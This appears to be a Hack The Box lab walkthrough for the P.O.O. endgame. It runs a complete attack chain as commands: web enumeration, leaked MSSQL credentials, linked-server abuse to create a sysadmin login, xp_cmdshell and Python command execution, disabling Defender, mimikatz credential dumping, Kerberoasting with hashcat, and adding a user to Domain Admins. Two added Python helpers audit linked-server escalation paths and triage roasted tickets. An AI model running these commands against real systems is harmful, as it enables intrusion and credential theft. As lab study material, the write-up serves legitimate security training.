P.O.O.
https://app.hackthebox.com/endgames/poo
Introduction
Professional Offensive Operations
Professional Offensive Operations is a rising name in the cyber security world.
Lately they've been working on migrating core services and components to a state-of-the-art cluster that offers cutting-edge software and hardware.
P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.
The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.
Entry Point: 10.13.38.11
Enumeration
ping -c 1 10.13.38.11 -R
NMAP Scans
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts
nmap -p80,1433 -sCV 10.13.38.11 -oN targeted
# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after: 2054-03-29T19:52:54
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds
Bruteforce Directories
dirsearch -u 10.13.38.11
.DS_Store Directory Enumeration
python ds_walk.py -u http://10.13.38.11
Output of ds_walk.py
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.
IIS Shortname Scanner
python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
poo_co~1.txt
_co%%%%
Path bruteforce with WFUZZ
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
MSSQL Enumeration / Linkcrawler
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run
search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
Installing usql as an MSSQL client
go install -tags most github.com/xo/usql@latest
usql
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#
MSSQL Enumeration
SELECT name FROM sys.databases;
SELECT suser_name();
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');
Adding Username to the DB
EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
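The loop the queries above walk one hop at a time (a public instance linked to a config instance that links back with a higher-privileged mapping) is a configuration defect a DBA can find from the catalog views before anyone crawls it. Added audit helper, not part of this writeup or of any tool it uses: it takes rows exported per instance from sys.servers joined to sys.linked_logins (the sample below is constructed, with invented server and login names) and reports every hop sequence through which an ordinary login on the entry instance lands in a sysadmin context. It assumes each fixed remote-login mapping applies to every caller, i.e. the catch-all mapping case (local_principal_id = 0).

```python
from collections import deque

# Constructed sample of a per-instance export of sys.servers joined to sys.linked_logins.
# src: instance the link is defined on; dst: the linked server; remote_login: the fixed
# remote login the link is mapped to (None = pass-through of the caller's own credentials);
# remote_sysadmin: whether that remote login holds sysadmin on dst. All names are invented.
LINKS = [
    {"src": "SRV1\\PUBLIC", "dst": "SRV1\\CONFIG",  "remote_login": "link_reader", "remote_sysadmin": False},
    {"src": "SRV1\\CONFIG", "dst": "SRV1\\PUBLIC",  "remote_login": "sa",          "remote_sysadmin": True},
    {"src": "SRV1\\CONFIG", "dst": "SRV2\\REPORTS", "remote_login": None,          "remote_sysadmin": False},
]


def escalation_paths(links, entry_instance, entry_is_sysadmin=False):
    """Breadth-first walk over linked-server mappings from a login on entry_instance.

    A state is (instance, has_sysadmin). A fixed mapping replaces the caller's privilege
    with the mapped login's; a pass-through mapping keeps it. Every path that first
    reaches a sysadmin state is returned, so each one points at a mapping to fix.
    """
    start = (entry_instance, entry_is_sysadmin)
    queue = deque([(start, [entry_instance])])
    seen = {start}
    found = []
    while queue:
        (instance, is_sa), path = queue.popleft()
        for link in links:
            if link["src"] != instance:
                continue
            next_sa = is_sa if link["remote_login"] is None else link["remote_sysadmin"]
            state = (link["dst"], next_sa)
            if state in seen:
                continue
            seen.add(state)
            next_path = path + [link["dst"]]
            if next_sa:
                found.append(next_path)
            queue.append((state, next_path))
    return found
```

Every path returned ends on a link whose mapped remote login should be replaced with a least-privileged one, or the link removed; pass-through mappings keep the caller's own rights and do not escalate by themselves.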
Check Username
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run
XP_cmdshell
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go
Enabling external scripts
EXEC sp_configure 'external scripts enabled', 1
reconfigure
go
Using external scripts (example)
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go
Read web.config to extract the administrator credentials.
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go
echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts
Evil-WinRM
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."
net user administrator
Set-MpPreference -DisableRealtimeMonitoring $true
Mimikatz.exe
.\mimikatz.exe token::elevate lsadump::cache exit
Invoke-Kerberoast.ps1
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat | fl"'
go
hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt
ZQ!5t4r
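The ticket line Invoke-Kerberoast produced above starts with $krb5tgs$23$, i.e. an RC4 service ticket, which is the only reason a keyboard-pattern wordlist cracks it in seconds. Added triage helper, not part of the writeup: it parses hashcat-format krb5tgs lines (the etype 23 shape shown above and the etype 17/18 shape), recovers the service account, realm and SPN, and marks RC4 tickets so the affected accounts can be rotated and moved to AES. The sample lines are constructed with filler hex.

```python
import re
from dataclasses import dataclass

# Two line shapes hashcat accepts for roasted service tickets:
#   mode 13100, etype 23 (RC4):    $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   mode 19600/19700, etype 17/18: $krb5tgs$18$user$REALM$*spn*$checksum$edata
_RC4_LINE = re.compile(r"^\$krb5tgs\$(\d+)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9A-Fa-f]+)\$([0-9A-Fa-f]+)$")
_AES_LINE = re.compile(r"^\$krb5tgs\$(\d+)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9A-Fa-f]+)\$([0-9A-Fa-f]+)$")
ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# Constructed sample lines; checksum and ciphertext are filler hex, not real ticket data.
SAMPLE_RC4 = "$krb5tgs$23$*svc_web$EXAMPLE.LOCAL$HTTP/web.example.local*$" + "ab" * 16 + "$" + "cd" * 40
SAMPLE_AES = "$krb5tgs$18$svc_sql$EXAMPLE.LOCAL$*MSSQLSvc/db.example.local:1433*$" + "ab" * 12 + "$" + "cd" * 40


@dataclass
class RoastedTicket:
    etype: int
    account: str
    realm: str
    spn: str

    @property
    def weak(self) -> bool:
        # An RC4 ticket means the account still advertises RC4: one MD4 plus one HMAC per
        # password guess. AES tickets cost 4096 PBKDF2 rounds per guess on top of that.
        return self.etype == 23


def parse_krb5tgs(line: str) -> RoastedTicket:
    """Parse one hashcat-format krb5tgs line; raise ValueError for anything else."""
    line = line.strip()
    m = _RC4_LINE.match(line) or _AES_LINE.match(line)
    if not m:
        raise ValueError("not a krb5tgs line")
    return RoastedTicket(int(m.group(1)), m.group(2), m.group(3), m.group(4))


def triage(lines):
    """One finding per line: which service account was exposed and what to do about it."""
    findings = []
    for line in lines:
        t = parse_krb5tgs(line)
        findings.append({
            "account": t.account, "realm": t.realm, "spn": t.spn,
            "etype": ETYPE_NAMES.get(t.etype, str(t.etype)),
            "action": ("rotate to a long random password and restrict msDS-SupportedEncryptionTypes to AES"
                       if t.weak else "rotate to a long random password; AES already in use"),
        })
    return findings
```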
Sharphound
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go
PowerView.ps1
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .
$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred
# Equivalent form using the PSCredential constructor directly
$pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred